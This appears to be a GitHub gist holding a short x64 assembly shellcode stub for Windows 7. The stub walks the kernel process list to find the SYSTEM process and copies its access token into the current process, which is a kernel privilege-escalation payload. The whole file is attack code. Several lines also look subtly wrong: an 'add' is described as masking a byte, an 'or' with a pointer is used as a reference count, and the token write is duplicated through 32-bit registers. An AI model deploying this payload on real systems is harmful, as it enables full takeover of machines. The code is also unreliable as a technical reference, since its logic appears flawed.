Created
June 4, 2020 06:09
-
-
Save achilles4828/7d029d0def34c518fff701362dce24f7 to your computer and use it in GitHub Desktop.
Windows 7 x64 Token Stealing Shellcode Stub for current process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .code | |
| PUBLIC get_token | |
| get_token proc | |
| ;required register cleaning | |
| ; Get pointer to _EPROCESS Structure | |
| xor rax, rax ; Set Zero | |
| mov rax, gs:[rax + KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread | |
| mov rax, [rax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process | |
| mov rcx, rax ; Copy current _EPROCESS structure | |
| mov r8, rcx ; Store refernce point for token | |
| add r8, 7 ; byte align | |
| ; Assign System PID | |
| mov rdx, SYSTEM_PID ; 0x004 | |
| ; GetSystemPID Loop Logic | |
| ; pprocess = current_process | |
| ; while pprocess->UniqueProcessId ! = SystemProcess->UniqueProcessId { | |
| ; pprocess = pprocess->Flink | |
| ; } | |
| GetSystemPID: | |
| mov rax, [rax + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink | |
| sub rax, FLINK_OFFSET ; Next Process | |
| cmp[rax + Unique_PID], rdx ; Compare the Unique Process ID with 4 | |
| jne GetSystemPID | |
| mov rdx, [rax + TOKEN] ; Copy SYSTEM process nt!_EPRCOESS -> Token | |
| add rdx, 0f0h ; Nullify last byte of the token | |
| or rdx, r8 ; Token Refernce Count | |
| mov[rcx + TOKEN], rdx ; Copy token of system to current process | |
| mov[ecx + TOKEN], edx ; Copy token of system to current process | |
| ; stack_alignment | |
| get_token ENDP | |
| END |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment